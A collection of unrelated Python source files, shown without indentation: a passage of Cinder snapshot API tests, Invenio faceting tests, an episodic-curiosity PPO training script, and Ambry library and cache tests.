req.headers['Content-Type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.NOT_FOUND, res.status_int)
self.assertEqual(http_client.NOT_FOUND,
res_dict['itemNotFound']['code'])
self.assertEqual('GroupSnapshot invalid_id could not be found.',
res_dict['itemNotFound']['message'])
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
def test_create_cgsnapshot_from_empty_consistencygroup(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
body = {"cgsnapshot": {"name": "cg1",
"description":
"CG Snapshot 1",
"consistencygroup_id": consistencygroup.id}}
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.method = 'POST'
req.headers['Content-Type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual(http_client.BAD_REQUEST,
res_dict['badRequest']['code'])
self.assertIsNotNone(res_dict['badRequest']['message'])
# If failed to create cgsnapshot, its DB object should not be created
self.assertListEqual(
[],
list(objects.GroupSnapshotList.get_all(self.context)))
consistencygroup.destroy()
def test_delete_cgsnapshot_available(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,
status='available')
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
(fake.PROJECT_ID, cgsnapshot.id))
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
cgsnapshot = objects.GroupSnapshot.get_by_id(self.context,
cgsnapshot.id)
self.assertEqual(http_client.ACCEPTED, res.status_int)
self.assertEqual('deleting', cgsnapshot.status)
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
def test_delete_cgsnapshot_available_used_as_source(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,
status='available')
cg2 = utils.create_consistencygroup(
self.context, status='creating',
group_snapshot_id=cgsnapshot.id,
group_type_id=fake.GROUP_TYPE_ID)
req = webob.Request.blank('/v2/fake/cgsnapshots/%s' %
cgsnapshot.id)
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app())
cgsnapshot = objects.GroupSnapshot.get_by_id(self.context,
cgsnapshot.id)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual('available', cgsnapshot.status)
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
cg2.destroy()
def test_delete_cgsnapshot_with_cgsnapshot_NotFound(self):
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
(fake.PROJECT_ID, fake.WILL_NOT_BE_FOUND_ID))
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.NOT_FOUND, res.status_int)
self.assertEqual(http_client.NOT_FOUND,
res_dict['itemNotFound']['code'])
self.assertEqual('GroupSnapshot %s could not be found.' %
fake.WILL_NOT_BE_FOUND_ID,
res_dict['itemNotFound']['message'])
def test_delete_cgsnapshot_with_invalid_cgsnapshot(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,
status='invalid')
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
fake.PROJECT_ID, cgsnapshot.id))
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual(http_client.BAD_REQUEST,
res_dict['badRequest']['code'])
self.assertIsNotNone(res_dict['badRequest']['message'])
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
@mock.patch('cinder.group.API.delete_group_snapshot')
def test_delete_cgsnapshot_delete_policy_not_auth(self, mock_delete):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,
status='available')
mock_delete.side_effect = exception.PolicyNotAuthorized(
message='PolicyNotAuthorized')
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
(fake.PROJECT_ID, cgsnapshot.id))
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual('PolicyNotAuthorized',
res_dict['forbidden']['message'])
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
|
<filename>tests/resources/test_resource_faceting.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
# Copyright (C) 2020 Northwestern University.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Test faceting."""
import pytest
from mock_module.api import Record
from mock_module.config import ServiceConfig
from invenio_records_resources.services import RecordService
# 2 things to test
# 1- results are aggregated / post_filtered
# 2- links are generated
@pytest.fixture(scope="module")
def three_indexed_records(app, identity_simple, es):
# NOTE: es is used (and not es_clear) here because all tests
# assume 3 records have been indexed and NO tests in this module
# adds/deletes any.
service = RecordService(ServiceConfig)
def _create(metadata):
data = {
'metadata': {
'title': 'Test',
**metadata
},
}
service.create(identity_simple, data)
_create({"title": "Record 1", "type": {"type": "A", "subtype": "AA"}})
_create({"title": "Record 2", "type": {"type": "A", "subtype": "AB"}})
_create({"title": "Record 3", "type": {"type": "B"}})
Record.index.refresh()
#
# 1- results are aggregated / post_filtered
#
def test_aggregating(client, headers, three_indexed_records):
response = client.get("/mocks", headers=headers)
response_aggs = response.json["aggregations"]
expected_aggs = {
"type": {
"buckets": [
{
"doc_count": 2,
"key": "A",
"subtype": {
"buckets": [
{
"doc_count": 1,
"key": "AA"
},
{
"doc_count": 1,
"key": "AB"
}
],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0
}
},
{
"doc_count": 1,
"key": "B",
"subtype": {
"buckets": [],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0
}
}
],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0,
}
}
assert expected_aggs == response_aggs
def test_post_filtering(client, headers, three_indexed_records):
response = client.get("/mocks?type=A", headers=headers)
assert response.status_code == 200
# Test aggregation is the same
response_aggs = response.json["aggregations"]
expected_aggs = {
"type": {
"buckets": [
{
"doc_count": 2,
"key": "A",
"subtype": {
"buckets": [
{
"doc_count": 1,
"key": "AA"
},
{
"doc_count": 1,
"key": "AB"
}
],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0
}
},
{
"doc_count": 1,
"key": "B",
"subtype": {
"buckets": [],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0
}
}
],
'doc_count_error_upper_bound': 0,
'sum_other_doc_count': 0,
}
}
assert expected_aggs == response_aggs
# Test hits are filtered
response_hits = response.json["hits"]["hits"]
assert 2 == len(response_hits)
assert set(["Record 1", "Record 2"]) == set(
[h["metadata"]["title"] for h in response_hits]
)
#
# 2- links are generated
#
def test_links_keep_facets(client, headers, three_indexed_records):
response = client.get("/mocks?type=A**B", headers=headers)
response_links = response.json["links"]
expected_links = {
"self": (
"https://127.0.0.1:5000/api/mocks?"
"page=1&size=25&sort=newest&type=A%2A%2AB"
),
}
for key, url in expected_links.items():
assert url == response_links[key]
def test_links_keep_repeated_facets(client, headers, three_indexed_records):
response = client.get(
"/mocks?size=1&type=B&type=A",
headers=headers
)
response_links = response.json["links"]
expected_links = {
"self": (
"https://127.0.0.1:5000/api/mocks?page=1&size=1&sort=newest"
"&type=B&type=A"
),
"next": (
"https://127.0.0.1:5000/api/mocks?page=2&size=1&sort=newest"
"&type=B&type=A"
),
}
for key, url in expected_links.items():
assert url == response_links[key]
|
<reponame>cclauss/episodic-curiosity<filename>episodic_curiosity/train_policy.py
# coding=utf-8
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Main file for training policies.
Many hyperparameters need to be passed through gin flags.
Consider using scripts/launcher_script.py to invoke train_policy with the
right hyperparameters and flags.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import time
from absl import flags
from episodic_curiosity import env_factory
from episodic_curiosity import eval_policy
from episodic_curiosity import utils
from third_party.baselines import logger
from third_party.baselines.ppo2 import policies
from third_party.baselines.ppo2 import ppo2
import gin
import tensorflow as tf
flags.DEFINE_string('workdir', None,
'Root directory for writing logs/summaries/checkpoints.')
flags.DEFINE_string('env_name', 'CartPole-v0', 'What environment to run')
flags.DEFINE_string('policy_architecture', 'cnn',
'What model architecture to use')
flags.DEFINE_string('r_checkpoint', '', 'Location of the R-network checkpoint')
flags.DEFINE_integer('num_env', 12, 'Number of environment copies to run in '
'subprocesses.')
flags.DEFINE_string('dmlab_homepath', '', '')
flags.DEFINE_integer('num_timesteps', 10000000, 'Number of frames to run '
'training for.')
flags.DEFINE_string('action_set', '',
'(small|nofire|) - which action set to use')
flags.DEFINE_bool('use_curiosity', False,
'Whether to enable Pathak\'s curiosity')
flags.DEFINE_bool('random_state_predictor', False,
'Whether to use random state predictor for Pathak\'s '
'curiosity')
flags.DEFINE_float('curiosity_strength', 0.01,
'Strength of the intrinsic reward in Pathak\'s algorithm.')
flags.DEFINE_float('forward_inverse_ratio', 0.2,
'Weighting of forward vs inverse loss in Pathak\'s '
'algorithm')
flags.DEFINE_float('curiosity_loss_strength', 10,
'Weight of the curiosity loss in Pathak\'s algorithm.')
# pylint: disable=g-inconsistent-quotes
flags.DEFINE_multi_string(
'gin_files', [], 'List of paths to gin configuration files')
flags.DEFINE_multi_string(
'gin_bindings', [],
'Gin bindings to override the values set in the config files '
'(e.g. "DQNAgent.epsilon_train=0.1",'
' "create_environment.game_name="Pong"").')
# pylint: enable=g-inconsistent-quotes
FLAGS = flags.FLAGS
def get_environment(env_name):
dmlab_prefix = 'dmlab:'
atari_prefix = 'atari:'
parkour_prefix = 'parkour:'
if env_name.startswith(dmlab_prefix):
level_name = env_name[len(dmlab_prefix):]
return env_factory.create_environments(
level_name,
FLAGS.num_env,
FLAGS.r_checkpoint,
FLAGS.dmlab_homepath,
action_set=FLAGS.action_set,
r_network_weights_store_path=FLAGS.workdir)
elif env_name.startswith(atari_prefix):
level_name = env_name[len(atari_prefix):]
return env_factory.create_environments(
level_name,
FLAGS.num_env,
FLAGS.r_checkpoint,
environment_engine='atari',
r_network_weights_store_path=FLAGS.workdir)
if env_name.startswith(parkour_prefix):
return env_factory.create_environments(
env_name[len(parkour_prefix):],
FLAGS.num_env,
FLAGS.r_checkpoint,
environment_engine='parkour',
r_network_weights_store_path=FLAGS.workdir)
raise ValueError('Unknown environment: {}'.format(env_name))
@gin.configurable
def train(workdir, env_name, num_timesteps,
nsteps=256,
nminibatches=4,
noptepochs=4,
learning_rate=2.5e-4,
ent_coef=0.01):
"""Runs PPO training.
Args:
workdir: where to store experiment results/logs
env_name: the name of the environment to run
num_timesteps: for how many timesteps to run training
nsteps: Number of consecutive environment steps to use during training.
nminibatches: Minibatch size.
noptepochs: Number of optimization epochs.
learning_rate: Initial learning rate.
ent_coef: Entropy coefficient.
"""
train_measurements = utils.create_measurement_series(workdir, 'reward_train')
valid_measurements = utils.create_measurement_series(workdir, 'reward_valid')
test_measurements = utils.create_measurement_series(workdir, 'reward_test')
def measurement_callback(unused_eplenmean, eprewmean, global_step_val):
if train_measurements:
train_measurements.create_measurement(
objective_value=eprewmean, step=global_step_val)
def eval_callback_on_valid(eprewmean, global_step_val):
if valid_measurements:
valid_measurements.create_measurement(
objective_value=eprewmean, step=global_step_val)
def eval_callback_on_test(eprewmean, global_step_val):
if test_measurements:
test_measurements.create_measurement(
objective_value=eprewmean, step=global_step_val)
logger_dir = workdir
logger.configure(logger_dir)
env, valid_env, test_env = get_environment(env_name)
is_ant = env_name.startswith('parkour:')
# Validation metric.
policy_evaluator_on_valid = eval_policy.PolicyEvaluator(
valid_env,
metric_callback=eval_callback_on_valid,
video_filename=None)
# Test metric (+ videos).
video_filename = os.path.join(FLAGS.workdir, 'video')
policy_evaluator_on_test = eval_policy.PolicyEvaluator(
test_env,
metric_callback=eval_callback_on_test,
video_filename=video_filename,
grayscale=(env_name.startswith('atari:')))
# Delay to make sure that all the DMLab environments acquire
# the GPU resources before TensorFlow acquire the rest of the memory.
# TODO(damienv): Possibly use allow_grow in a TensorFlow session
# so that there is no such problem anymore.
time.sleep(15)
cloud_sync_callback = lambda: None
def evaluate_valid_test(model_step_fn, global_step):
if not is_ant:
policy_evaluator_on_valid.evaluate(model_step_fn, global_step)
policy_evaluator_on_test.evaluate(model_step_fn, global_step)
with tf.Session():
policy = {'cnn': policies.CnnPolicy,
'lstm': policies.LstmPolicy,
'lnlstm': policies.LnLstmPolicy,
'mlp': policies.MlpPolicy}[FLAGS.policy_architecture]
# Openai baselines never performs num_timesteps env steps because
# of the way it samples training data in batches. The number of timesteps
# is multiplied by 1.1 (hacky) to insure at least num_timesteps are
# performed.
ppo2.learn(policy, env=env, nsteps=nsteps, nminibatches=nminibatches,
lam=0.95, gamma=0.99, noptepochs=noptepochs, log_interval=1,
ent_coef=ent_coef,
lr=learning_rate if is_ant else lambda f: f * learning_rate,
cliprange=0.2 if is_ant else lambda f: f * 0.1,
total_timesteps=int(num_timesteps * 1.1),
train_callback=measurement_callback,
eval_callback=evaluate_valid_test,
cloud_sync_callback=cloud_sync_callback,
save_interval=200, workdir=workdir,
use_curiosity=FLAGS.use_curiosity,
curiosity_strength=FLAGS.curiosity_strength,
forward_inverse_ratio=FLAGS.forward_inverse_ratio,
curiosity_loss_strength=FLAGS.curiosity_loss_strength,
random_state_predictor=FLAGS.random_state_predictor)
cloud_sync_callback()
test_env.close()
valid_env.close()
utils.maybe_close_measurements(train_measurements)
utils.maybe_close_measurements(valid_measurements)
utils.maybe_close_measurements(test_measurements)
def main(_):
utils.dump_flags_to_file(os.path.join(FLAGS.workdir, 'flags.txt'))
tf.logging.set_verbosity(tf.logging.INFO)
gin.parse_config_files_and_bindings(FLAGS.gin_files,
FLAGS.gin_bindings)
train(FLAGS.workdir, env_name=FLAGS.env_name,
num_timesteps=FLAGS.num_timesteps)
if __name__ == '__main__':
tf.app.run()
|
'''
Created on Jun 30, 2012
@author: eric
'''
import unittest
import os.path
from testbundle.bundle import Bundle
from sqlalchemy import * #@UnusedWildImport
from ambry.run import get_runconfig, RunConfig
from ambry.library.query import QueryCommand
import logging
import ambry.util
from test_base import TestBase
logger = ambry.util.get_logger(__name__)
logger.setLevel(logging.DEBUG)
class Test(TestBase):
def setUp(self):
import testbundle.bundle
self.bundle_dir = os.path.dirname(testbundle.bundle.__file__)
self.rc = get_runconfig((os.path.join(self.bundle_dir,'library-test-config.yaml'),
os.path.join(self.bundle_dir,'bundle.yaml'),
RunConfig.USER_ACCOUNTS)
)
self.copy_or_build_bundle()
self.bundle = Bundle()
print "Deleting: {}".format(self.rc.group('filesystem').root)
Test.rm_rf(self.rc.group('filesystem').root)
@staticmethod
def rm_rf(d):
if not os.path.exists(d):
return
for path in (os.path.join(d,f) for f in os.listdir(d)):
if os.path.isdir(path):
Test.rm_rf(path)
else:
os.unlink(path)
os.rmdir(d)
def get_library(self, name = 'default'):
"""Clear out the database before the test run"""
from ambry.library import new_library
config = self.rc.library(name)
l = new_library(config, reset = True)
return l
def tearDown(self):
pass
@staticmethod
def new_db():
from ambry.util import temp_file_name
from ambry.library.database import LibraryDb
db_file = temp_file_name()+".db"
db = LibraryDb(driver='sqlite', dbname=db_file)
return db_file, db
def test_database(self):
f,db = self.new_db()
##
## Test basic creation
##
self.assertFalse(db.exists())
db.create()
self.assertTrue(db.exists())
db.set_config_value('test','one',1)
db.set_config_value('test','two',2)
self.assertEquals(1,db.get_config_value('test','one').value)
self.assertEquals(2,db.get_config_value('test','two').value)
self.assertIn(('test', 'one'),db.config_values)
self.assertIn(('test', 'two'),db.config_values)
self.assertEquals(2,db.config_values[('test', 'two')])
self.assertEquals(0, len(db.list()))
db.drop()
self.assertTrue(os.path.exists(f))
self.assertFalse(db.exists())
os.remove(f)
def test_database_query(self):
from ambry.orm import Dataset, Partition
from ambry.library.query import Resolver
from ambry.library.database import ROOT_CONFIG_NAME_V
f,db = self.new_db()
print 'Testing ', f
db.create()
db.install_bundle(self.bundle)
#
# Get a bunch of names from the existing bundles. This will check the simple
# queries for single objects.
#
tests = {}
for r in db.session.query(Dataset, Partition).filter(Dataset.vid != ROOT_CONFIG_NAME_V).all():
di = r.Dataset.identity
tests[di.sname] = di.vid
tests[di.vname] = di.vid
tests[di.fqname] = di.vid
tests[di.vid] = di.vid
pi = r.Partition.identity
tests[pi.sname] = pi.vid
tests[pi.vname] = pi.vid
tests[pi.fqname] = pi.vid
tests[pi.vid] = pi.vid
r = Resolver(db.session)
for ref, vid in tests.items():
ip, results = r.resolve_ref_all(ref)
self.assertEqual(1, len(results))
first= results.values().pop(0)
vid2 = first.vid if not first.partitions else first.partitions.values()[0].vid
self.assertEquals(vid, vid2)
def test_simple_install(self):
from ambry.util import temp_file_name
import pprint
import os
l = self.get_library()
print "Library: ", l.database.dsn
r = l.put(self.bundle) #@UnusedVariable
r = l.get(self.bundle.identity.sname)
self.assertTrue(r is not False)
self.assertEquals(self.bundle.identity.sname, r.identity.sname)
r = l.get('dibberish')
self.assertFalse(r)
for partition in self.bundle.partitions:
print "Install and check: ", partition.identity.vname
r = l.put(partition)
# Get the partition with a name
r = l.get(partition.identity.sname)
self.assertTrue(r is not False)
self.assertEquals(partition.identity.sname, r.partition.identity.sname)
self.assertEquals(self.bundle.identity.sname, r.identity.sname)
# Get the partition with an id
r = l.get(partition.identity.id_)
self.assertTrue(bool(r))
self.assertEquals(partition.identity.sname, r.partition.identity.sname)
self.assertEquals(self.bundle.identity.sname, r.identity.sname)
self.assertTrue(l.database.needs_dump())
backup_file = temp_file_name()+".db"
l.database.dump(backup_file)
l.database.close()
os.remove(l.database.dbname)
l.database.create()
r = l.get(self.bundle.identity.sname)
self.assertTrue(not r)
l.database.restore(backup_file)
r = l.get(self.bundle.identity.sname)
self.assertTrue(r is not False)
self.assertEquals(self.bundle.identity.sname, r.identity.sname)
os.remove(backup_file)
# An extra change so the following tests work
l.put(self.bundle)
self.assertFalse(l.database.needs_dump())
import time; time.sleep(10)
self.assertTrue(l.database.needs_dump())
def test_library_install(self):
'''Install the bundle and partitions, and check that they are
correctly installed. Check that installation is idempotent'''
l = self.get_library()
print l.database.dsn
l.put_bundle(self.bundle)
l.put_bundle(self.bundle)
r = l.get(self.bundle.identity)
self.assertIsNotNone(r)
self.assertTrue(r is not False)
self.assertEquals(r.identity.id_, r.identity.id_)
# Install the partition, then check that we can fetch it
# a few different ways.
for partition in self.bundle.partitions:
l.put_partition(self.bundle, partition)
l.put_partition(self.bundle, partition)
r = l.get(partition.identity)
self.assertIsNotNone(r)
self.assertEquals( partition.identity.id_, r.partition.identity.id_)
r = l.get(partition.identity.id_)
self.assertIsNotNone(r)
self.assertEquals(partition.identity.id_, r.partition.identity.id_)
# Re-install the bundle, then check that the partitions are still properly installed
l.put_bundle(self.bundle)
for partition in self.bundle.partitions.all:
r = l.get(partition.identity)
self.assertIsNotNone(r)
self.assertEquals(r.partition.identity.id_, partition.identity.id_)
r = l.get(partition.identity.id_)
self.assertIsNotNone(r)
self.assertEquals(r.partition.identity.id_, partition.identity.id_)
# Find the bundle and partitions in the library.
r = l.find(QueryCommand().table(name='tone'))
self.assertEquals('source-dataset-subset-variation',r[0]['identity']['name'])
r = l.find(QueryCommand().table(name='tone').partition(format='db', grain=None))
self.assertEquals('source-dataset-subset-variation-tone',r[0]['partition']['name'])
r = l.find(QueryCommand().table(name='tthree').partition(format='db', segment=None))
self.assertEquals('source-dataset-subset-variation-tthree',r[0]['partition']['name'])
#
# Try getting the files
#
r = l.find(QueryCommand().table(name='tthree').partition(any=True)) #@UnusedVariable
bp = l.get(r[0]['identity']['id'])
self.assertTrue(os.path.exists(bp.database.path))
# Put the bundle with remove to check that the partitions are reset
l.remove(self.bundle)
r = l.find(QueryCommand().table(name='tone').partition(any=True))
self.assertEquals(0, len(r))
l.put_bundle(self.bundle)
r = l.find(QueryCommand().table(name='tone').partition(any=True))
self.assertEquals(2, len(r))
ds_names = [ds.sname for ds in l.list().values()]
self.assertIn('source-dataset-subset-variation', ds_names)
def test_versions(self):
import testbundle.bundle
from ambry.run import get_runconfig
from ambry.library.query import Resolver
import shutil
idnt = self.bundle.identity
l = self.get_library()
l.purge()
orig = os.path.join(self.bundle.bundle_dir,'bundle.yaml')
save = os.path.join(self.bundle.bundle_dir,'bundle.yaml.save')
shutil.copyfile(orig,save)
datasets = {}
try:
for i in [1,2,3]:
idnt._on.revision = i
idnt.name.version_major = i
idnt.name.version_minor = i*10
bundle = Bundle()
bundle.config.rewrite(identity=idnt.ident_dict,
names=idnt.names_dict)
get_runconfig.clear() #clear runconfig cache
print 'Building version {}'.format(i)
bundle = Bundle()
bundle.clean()
bundle.pre_prepare()
bundle.prepare()
bundle.post_prepare()
bundle.pre_build()
bundle.build_small()
#bundle.build()
bundle.post_build()
bundle = Bundle()
print "Installing ", bundle.identity.vname
l.put(bundle)
finally:
pass
os.rename(save, orig)
#
# Save the list of datasets for version analysis in other
# tests
#
db = l.database
for d in db.list().values():
datasets[d.vid] = d.dict
datasets[d.vid]['partitions'] = {}
for p_vid, p in d.partitions.items():
datasets[d.vid]['partitions'][p_vid] = p.dict
with open(self.bundle.filesystem.path('meta','version_datasets.json'),'w') as f:
import json
f.write(json.dumps(datasets))
r = Resolver(db.session)
ref = idnt.id_
ref = "source-dataset-subset-variation-=2.20"
ip, results = r.resolve_ref_all(ref)
for row in results:
print row
#os.remove(f)
def test_version_resolver(self):
from ambry.library.query import Resolver
l = self.get_library()
print l.database.dsn
db = l.database
db.enable_delete = True
db.drop()
db.create()
l.put_bundle(self.bundle)
r = Resolver(db.session)
vname = 'source-dataset-subset-variation-0.0.1'
name = 'source-dataset-subset-variation'
ip, results = r.resolve_ref_one(vname)
self.assertEquals(vname, results.vname)
ip, results = r.resolve_ref_one(name)
self.assertEquals(vname, results.vname)
# Cache keys
ip, result = r.resolve_ref_one('source/dataset-subset-variation-0.0.1.db')
self.assertEquals('source-dataset-subset-variation-0.0.1~diEGPXmDC8001',str(result))
ip, result = r.resolve_ref_one('source/dataset-subset-variation-0.0.1/tthree.db')
self.assertEquals('source-dataset-subset-variation-tthree-0.0.1~piEGPXmDC8001001',str(result.partition))
# Now in the library, which has a slightly different interface.
ident = l.resolve(vname)
self.assertEquals(vname, ident.vname)
ident = l.resolve('source-dataset-subset-variation-0.0.1~diEGPXmDC8001')
self.assertEquals('diEGPXmDC8001', ident.vid)
ident = l.resolve('source-dataset-subset-variation-tthree-0.0.1~piEGPXmDC8001001')
self.assertEquals('diEGPXmDC8001', ident.vid)
self.assertEquals('piEGPXmDC8001001', ident.partition.vid)
##
## Test semantic version matching
## WARNING! The Mock object below only works for testing semantic versions.
##
with open(self.bundle.filesystem.path('meta','version_datasets.json')) as f:
import json
datasets = json.loads(f.read())
# This mock object only works on datasets; it will return all of the
# partitions for each dataset, and each of the datasets. It is only for testing
# version filtering.
class TestResolver(Resolver):
def _resolve_ref(self, ref, location=None):
from ambry.identity import Identity
ip = Identity.classify(ref)
return ip, { k:Identity.from_dict(ds) for k,ds in datasets.items() }
r = TestResolver(db.session)
ip, result = r.resolve_ref_one('source-dataset-subset-variation-==1.10.1')
self.assertEquals('source-dataset-subset-variation-1.10.1~diEGPXmDC8001',str(result))
ip, result = r.resolve_ref_one('source-dataset-subset-variation->=1.10.1,<3.0.0')
self.assertEquals('source-dataset-subset-variation-2.20.2~diEGPXmDC8002',str(result))
ip, result = r.resolve_ref_one('source-dataset-subset-variation->=1.10.1,<2.0.0')
self.assertEquals('source-dataset-subset-variation-1.10.1~diEGPXmDC8001',str(result))
ip, result = r.resolve_ref_one('source-dataset-subset-variation->2.0.0')
self.assertEquals('source-dataset-subset-variation-3.30.3~diEGPXmDC8003',str(result))
ip, result = r.resolve_ref_one('source-dataset-subset-variation-<=3.0.0')
self.assertEquals('source-dataset-subset-variation-2.20.2~diEGPXmDC8002',str(result))
def test_cache(self):
from ambry.cache.filesystem import FsCache, FsLimitedCache
root = self.rc.group('filesystem').root
l1_repo_dir = os.path.join(root,'repo-l1')
os.makedirs(l1_repo_dir)
l2_repo_dir = os.path.join(root,'repo-l2')
os.makedirs(l2_repo_dir)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024):
f.write('.'*1023)
f.write('\n')
#
# Basic operations on a cache with no upstream
#
l2 = FsCache(l2_repo_dir)
p = l2.put(testfile,'tf1')
l2.put(testfile,'tf2')
g = l2.get('tf1')
self.assertTrue(os.path.exists(p))
self.assertTrue(os.path.exists(g))
self.assertEqual(p,g)
self.assertIsNone(l2.get('foobar'))
l2.remove('tf1')
self.assertIsNone(l2.get('tf1'))
#
# Now create the cache with an upstream, the first
# cache we created
l1 = FsLimitedCache(l1_repo_dir, upstream=l2, size=5)
print l1
print l2
g = l1.get('tf2')
self.assertTrue(g is not None)
# Put to one and check in the other.
l1.put(testfile,'write-through')
self.assertIsNotNone(l2.get('write-through'))
l1.remove('write-through', propagate=True)
self.assertIsNone(l2.get('write-through'))
# Put a bunch of files in, and check that
# l2 gets all of the files, but the size of l1 says constrained
for i in range(0,10):
l1.put(testfile,'many'+str(i))
self.assertEquals(4194304, l1.size)
# Check that the right files got deleted
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many5')))
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many6')))
# Fetch a file that was displaced, to check that it gets loaded back
# into the cache.
p = l1.get('many1')
p = l1.get('many2')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many1')))
# Should have deleted many6
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many6')))
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many7')))
#
# Check that verification works
#
l1.verify()
os.remove(os.path.join(l1.cache_dir, 'many8'))
with self.assertRaises(Exception):
l1.verify()
l1.remove('many8')
l1.verify()
c = l1.database.cursor()
c.execute("DELETE FROM files WHERE path = ?", ('many9',) )
l1.database.commit()
with self.assertRaises(Exception):
l1.verify()
l1.remove('many9')
l1.verify()
def x_test_remote(self):
from ambry.run import RunConfig
from ambry.library import new_library
rc = get_runconfig((os.path.join(self.bundle_dir,'server-test-config.yaml'),RunConfig.USER_CONFIG))
config = rc.library('default')
library = new_library(config)
print library.upstream
print library.upstream.last_upstream()
print library.cache
print library.cache.last_upstream()
def test_compression_cache(self):
'''Test a two-level cache where the upstream compresses files '''
from ambry.cache.filesystem import FsCache,FsCompressionCache
root = self.rc.group('filesystem').root
l1_repo_dir = os.path.join(root,'comp-repo-l1')
os.makedirs(l1_repo_dir)
l2_repo_dir = os.path.join(root,'comp-repo-l2')
os.makedirs(l2_repo_dir)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024): #@UnusedVariable
f.write('.'*1023)
f.write('\n')
# Create a cache with an upstream wrapped in compression
l3 = FsCache(l2_repo_dir)
l2 = FsCompressionCache(l3)
l1 = FsCache(l1_repo_dir, upstream=l2)
f1 = l1.put(testfile,'tf1')
self.assertTrue(os.path.exists(f1))
l1.remove('tf1', propagate=False)
self.assertFalse(os.path.exists(f1))
